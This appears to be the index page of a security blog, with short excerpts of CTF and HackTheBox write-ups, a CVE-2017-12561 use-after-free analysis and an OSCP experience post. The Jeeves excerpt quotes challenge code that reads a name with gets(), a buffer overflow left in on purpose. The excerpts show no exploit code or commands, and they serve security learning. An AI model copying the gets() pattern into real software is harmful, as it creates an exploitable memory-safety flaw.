HackTheBox - Jeeves Writeup

19 September 2021 at 00:00
Getting Started This challenge is pretty easy but I just thought I’d explain it in a blog post real quick since I started doing some of the HTB pwn challenges. Reverse Engineering The challenge itself is just a simple gets() buffer overflow. As you can see in the code below, it takes our name via a gets() call. printf("Hello, good sir!\nMay I have your name? "); gets(input_buffer); printf("Hello %s, hope you have a good day!

Analysis of CVE-2017-12561

In this post I am going to perform root-cause analysis of a bug reported by Steven Seeley in HP iMC 7.3 E0504P04, specifically in the “dbman” service. Steven found a Use-After-Free condition in opcode 10012. I was given this task as a challenge and I had a lot of fun. I was not totally comfortable with heap-type bugs so it was a really nice challenge to learn more about the heap.

BAE x BSides Chelt CTF

Introduction BAE hosted a CTF the day before BSides Cheltenham. I played with my friends. There was a crypto challenge which I saw a number of people struggling with. The challenge only got three solves in total; I was the first to solve it, so I thought I’d make a writeup of how I did it. The Challenge The challenge was reminiscent of the ECB penguin problem in the sense that we had two picture files in .

OSCP Experience

OSCP Experience At the time of writing I just passed my OSCP, and I thought I would follow the trend and make a blog post about my experience with both the exam and the course. Disclaimer: this post is old. The OSCP has undergone many updates since I took it, please keep that in mind. PWK Experience I originally was going to purchase 60 days; however, in the end I decided to purchase 30 days.

HackTheBox - Sunday Writeup

Introduction This is a writeup for the machine “Sunday” (10.10.10.76) on the platform HackTheBox. HackTheBox is a penetration testing labs platform where aspiring pen-testers and pen-testers can practice their hacking skills in a variety of different scenarios. Enumeration NMAP We’ll start off with our usual full-port nmap scan to see what kind of stuff is running on the box. I also ran a UDP scan as usual; however, in this case nothing was running on UDP.